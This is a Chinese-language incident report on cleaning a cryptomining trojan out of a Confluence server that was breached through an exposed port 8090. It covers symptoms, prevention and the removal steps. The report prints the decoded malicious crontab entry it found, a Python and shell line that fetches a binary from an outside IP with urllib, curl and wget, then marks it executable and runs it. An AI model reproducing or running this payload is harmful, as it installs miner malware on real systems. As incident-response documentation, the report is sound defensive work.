原因

木马通过Atlassian Confluence的端口后门入侵了confluence账号
安装时临时开了一下8090端口，后忘记关闭

避免措施

• 安装软件时修改默认端口
• 安装完成后立即关闭端口，用反向代理访问

症状

CPU占用100%
一个主进程占用CPU 100%，用户名confluence，Command为* **
多个其他进程不怎么占用CPU，用户名confluence，Command为ufw（不知道这个进程具体作用，但解决后发现切换confluence用户一直被踢出跟这个进程有关，而不是主进程）
主进程被Kill后恢复
切换confluence一直被踢出
阿里云安骑士有如下异常

• 挖矿木马程序
• 访问可疑IP
• 异常登录

查杀过程

查找所有用户的crontab

cat /etc/passwd | cut -f 1 -d : |xargs -I {} crontab -l -u {}

发现有 * * * * * 的可疑定时任务，是Base64编码的Shell脚本，解码后如下

( if ! kill -0 15169  > /dev/null; then python -c 'import os,sys,urllib,os.path;nm=os.urandom(4).encode("hex"); hm=os.path.expanduser("~/"); paths =[hm,"/tmp/","/var/tmp/","/dev/shm/"]; l_pth=next(iter(pth for pth in paths if os.access(pth, os.F_OK|os.R_OK|os.W_OK|os.X_OK ) or []), None);h=l_pth+nm; hd = urllib.urlretrieve ("http://37.228.129.58/home/sync", h); f.close();os.system("chmod 7777 {}".format(h));os.system("chmod +x {}".format(h)); os.system("{}".format(h))' ; curl -o /dev/shm/irir http://37.228.129.58/home/sync ; chmod 777 /dev/shm/irir ; /dev/shm/irir ; wget -O /tmp/rdir http://37.228.129.58/home/sync ; chmod 777 /tmp/rdir ; /tmp/rdir ; fi )

找到下载挖矿程序的IP地址，在阿里云安全组内先禁止出方向所有端口
找到挖矿程序 /dev/shm/irir 并删除
杀掉主进程和其他进程
切换至confluence用户并删除crontab

su confluence
crontab -r